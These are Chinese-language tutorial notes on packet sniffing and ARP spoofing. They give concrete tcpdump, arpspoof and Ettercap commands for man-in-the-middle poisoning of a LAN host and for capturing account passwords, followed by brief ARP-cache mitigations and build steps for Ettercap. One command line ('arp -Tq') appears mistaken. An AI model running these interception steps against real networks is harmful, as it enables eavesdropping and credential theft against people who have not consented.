數據包欺騙與分析
通過識別數據包中的數據提取處敏感信息,對於攻防有很重要的作用
tcpdump使用
tcpdump -v -i eth0 -w p.pcap
將抓取的包保存到p.pcap中
wireshark抓包
這裏最下部是源數據,中部是協議分析,上部是數據包
通過點擊左邊的expression實現數據包過濾
arp欺騙
- 1.arpspoof
首先開啓端口轉發(默認關閉),配置這個參數主要是爲了目標主機能夠上網,也就是說本地主機對目標主機的請求會裝發到網關。
echo 1 > /proc/sys/net/ipv4/ip_forward
開始欺騙
arpspoof -i eth0 -t 10.10.3.100 10.10.3.1(網關ip)
欺騙主機10.10.3.100指定ip(網關ip)對應自己的mac,因爲在局域網內是通過mac地址來識別主機的
- 2.Ettercap網絡嗅探
開啓ettercap gui
ettercap -G
選擇模式爲Unified
點擊Hosts list
將選擇兩個target,沒有強調誰是網關,這裏只是中間代理,作爲兩者之間的轉發人。
設置arp中毒
選擇第一個
再點擊start sniffing
解決措施:
配置路由器靜態綁定
然後清緩存arp表
linux
arp -n|awk '/^[1-9]/{system("arp -d "$1)}'
查看緩存arp表
arp -n
windows
arp -d
查看緩存arp表
arp -a
ettercap抓取賬號密碼
首先arp中毒
然後輸入arp -Tq -i eth0 [-L log_file_name]
這裏需要注意一下ettercap可能有些問題重新安裝
安裝依賴
apt-get install debhelper bison check cmake flex ghostscript libbsd-dev \
libcurl4-openssl-dev libgeoip-dev libltdl-dev libluajit-5.1-dev \
libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev \
libgtk-3-dev libgtk2.0-dev
克隆源碼,安裝
git clone https://github.com/Ettercap/ettercap
cd ettercap
mkdir build
cd build
cmake ..
make install
編譯後的程序爲
ettercap/build/src/ettercap